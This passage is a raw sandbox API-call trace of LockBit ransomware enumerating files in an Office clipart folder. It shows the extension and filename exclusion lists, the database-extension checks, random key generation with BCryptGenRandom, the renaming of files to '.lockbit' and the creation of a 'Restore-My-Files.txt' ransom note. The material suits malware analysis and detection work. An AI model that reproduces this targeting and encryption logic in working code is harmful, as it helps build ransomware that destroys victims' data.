1 [0103.499] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04385_.WMF") returned 1 [0103.499] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04385_.WMF") returned 1 [0103.499] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04385_.WMF") returned 1 [0103.499] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.499] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned=".WMF" [0103.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.499] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.499] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.500] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.500] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.lockbit") returned 72 [0103.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x814 [0103.501] CreateIoCompletionPort (FileHandle=0x814, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.501] malloc (_Size=0x40068) returned 0x3db00b8 [0103.502] GetFileSizeEx (in: hFile=0x814, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=5004) returned 1 [0103.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0103.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0103.504] ReadFile (in: hFile=0x814, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0103.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.516] malloc (_Size=0xa6) returned 0x77d800 [0103.516] NtSetInformationFile (FileHandle=0x814, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.517] free (_Block=0x77d800) [0103.517] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.517] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.517] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.517] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc41400, ftCreationTime.dwHighDateTime=0x1bd4c15, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcfc41400, ftLastWriteTime.dwHighDateTime=0x1bd4c15, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BABY_01.MID", cAlternateFileName="")) returned 1 [0103.517] lstrcmpiW (lpString1=".", lpString2="BABY_01.MID") returned -1 [0103.517] lstrcmpiW (lpString1="..", lpString2="BABY_01.MID") returned -1 [0103.517] PathFindExtensionW (pszPath="BABY_01.MID") returned=".MID" [0103.517] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0103.517] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0103.517] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0103.518] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0103.518] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0103.519] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0103.519] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BABY_01.MID") returned 1 [0103.519] lstrcmpiW (lpString1="ntldr", lpString2="BABY_01.MID") returned 1 [0103.519] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BABY_01.MID") returned 1 [0103.519] lstrcmpiW (lpString1="bootsect.bak", lpString2="BABY_01.MID") returned 1 [0103.520] lstrcmpiW (lpString1="autorun.inf", lpString2="BABY_01.MID") returned -1 [0103.520] lstrcmpiW (lpString1="thumbs.db", lpString2="BABY_01.MID") returned 1 [0103.520] lstrcmpiW (lpString1="iconcache.db", lpString2="BABY_01.MID") returned 1 [0103.520] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.520] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned=".MID" [0103.520] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0103.520] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0103.520] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0103.520] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0103.520] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0103.520] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0103.520] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0103.520] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0103.521] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0103.521] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.lockbit") returned 71 [0103.521] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x304 [0103.528] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.529] malloc (_Size=0x40068) returned 0x3e70008 [0103.529] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7384) returned 1 [0103.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0103.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0103.530] ReadFile (in: hFile=0x304, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.537] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.537] malloc (_Size=0xa4) returned 0x77d800 [0103.537] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0103.538] free (_Block=0x77d800) [0103.538] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.538] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.538] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.538] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1306, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD00116_.WMF", cAlternateFileName="")) returned 1 [0103.538] lstrcmpiW (lpString1=".", lpString2="BD00116_.WMF") returned -1 [0103.538] lstrcmpiW (lpString1="..", lpString2="BD00116_.WMF") returned -1 [0103.538] PathFindExtensionW (pszPath="BD00116_.WMF") returned=".WMF" [0103.538] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.538] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.539] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.539] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD00116_.WMF") returned 1 [0103.540] lstrcmpiW (lpString1="ntldr", lpString2="BD00116_.WMF") returned 1 [0103.540] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD00116_.WMF") returned 1 [0103.540] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD00116_.WMF") returned 1 [0103.540] lstrcmpiW (lpString1="autorun.inf", lpString2="BD00116_.WMF") returned -1 [0103.540] lstrcmpiW (lpString1="thumbs.db", lpString2="BD00116_.WMF") returned 1 [0103.540] lstrcmpiW (lpString1="iconcache.db", lpString2="BD00116_.WMF") returned 1 [0103.540] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.540] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned=".WMF" [0103.540] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.540] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.541] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.541] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.542] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.542] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.542] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.542] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.lockbit") returned 72 [0103.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f8 [0103.552] CreateIoCompletionPort (FileHandle=0x2f8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.552] malloc (_Size=0x40068) returned 0x3d70048 [0103.552] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=4870) returned 1 [0103.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0103.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0103.553] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.561] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.561] malloc (_Size=0xa6) returned 0x77d800 [0103.561] NtSetInformationFile (FileHandle=0x2f8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.561] free (_Block=0x77d800) [0103.561] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.561] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.562] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2332bb00, ftCreationTime.dwHighDateTime=0x1bd4fa4, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2332bb00, ftLastWriteTime.dwHighDateTime=0x1bd4fa4, nFileSizeHigh=0x0, nFileSizeLow=0x6906, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD00141_.WMF", cAlternateFileName="")) returned 1 [0103.562] lstrcmpiW (lpString1=".", lpString2="BD00141_.WMF") returned -1 [0103.562] lstrcmpiW (lpString1="..", lpString2="BD00141_.WMF") returned -1 [0103.562] PathFindExtensionW 